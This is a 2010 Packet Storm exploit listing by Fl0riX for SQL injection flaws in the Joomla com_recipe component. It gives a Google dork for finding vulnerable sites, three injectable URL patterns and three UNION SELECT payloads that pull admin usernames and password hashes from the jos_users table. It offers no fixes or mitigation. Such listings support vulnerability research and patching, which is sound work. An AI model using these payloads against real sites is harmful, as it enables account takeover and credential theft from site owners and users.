Joomla Recipe SQL Injection

2010-02-20T00:00:00
ID PACKETSTORM:86483
Type packetstorm
Reporter Fl0riX
Modified 2010-02-20T00:00:00

Description

                                        
                                            `  
########################################################################  
  
#   
Joomla Component com_recipe SQL Injection   
Vulnerabilities   
  
########################################################################   
  
#  
Author :FL0RiX  
  
#   
  
#Greez: All Tahkikat-ul Ahlak Family  
  
#   
  
#  
Name : com_recipe  
#  
# Google Dork: allinurl:"com_recipe"  
  
#   
  
#  
Bug Type : SQL Injection  
  
#   
  
#  
Infection : Admin login bilgileri alinabilir.   
  
#   
  
#  
Demo Vulns :  
  
#  
  
#   
site.com/index.php?option=com_recipe&view=recipe&layout=defaults&rec=73[EXPLOIT1]  
#   
site.com/index.php?option=com_recipe&task=type&Itemid=16&type=4&category=2[EXPLOIT2]  
#   
site.com/index.php?option=com_recipe&task=view&Itemid=16&id=4[EXPLOIT3]  
  
#  
  
#  
EXPLOIT1 :   
+and+1=0+union+select+concat(username,0x3a,password)+from+jos_users--  
#  
EXPLOIT2 :+and+1=0+union+select+1,concat(username,0x3a,password),3,4+from+jos_users--  
#  
EXPLOIT3 :+and+1=0+union+select+user(),concat(username,0x3a,password),user(),user()+from+jos_users--  
  
#############################################################################  
  
  
  
  
  
_________________________________________________________________  
Yeni Windows 7: Size en uygun bilgisayarý bulun. Daha fazla bilgi edinin.  
http://windows.microsoft.com/shop  
`